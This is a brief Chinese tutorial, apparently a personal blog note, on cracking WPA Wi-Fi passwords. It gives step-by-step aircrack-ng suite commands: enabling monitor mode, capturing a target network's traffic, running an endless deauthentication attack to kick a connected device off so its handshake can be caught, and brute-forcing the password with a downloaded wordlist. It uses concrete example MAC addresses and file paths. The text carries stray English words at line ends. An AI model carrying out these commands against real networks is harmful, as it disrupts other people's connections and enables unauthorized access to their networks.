ifconfig
找到你要用到的网卡git
airmon-ng start wlan0
个人是wlp2s0
wlan0mon
个人是wlp2s0mon
后面多了mon证实成功github
airodump-ng wlan0mon
个人是airodump-ng wlp2s0mon
记录下bssid ch 和bssid对应的stationcode
要在一个能够写入的文件下下打开终端get
airodump-ng -w 包名 -c ch --bssid bssid 使用的网卡名称mon
例如it
airodump-ng -w 403 -c 11 --bssid CE:2F:71:23:CC:74 wlp2s0mon
为了方便抓包咱们攻击这个wifi使链接的设备断开重连从而方便咱们抓包(重开一个终端执行攻击而不是结束抓包从而攻击)io
sudo aireplay-ng -0 0 -a bssid -c station 使用的网卡的名称mon
例如ast
sudo aireplay-ng -0 0 -a 76:E5:F9:D8:4A:73 -c AC:92:32:61:DC:65 wlp2s0mon
直到class
抓包的终端出现[ WPA handshake: CE:2F:71:23:CC:74终端
结束攻击结束抓包下载
sudo aircrack-ng -w 字典的路径 抓到包的路径
例如
sudo aircrack-ng -w /home/chen/下载/wpa-dictionary-master/other-1.txt /home/chen/下 载/403-01.cap
字典在github上有
https://github.com/conwnet/wpa-dictionary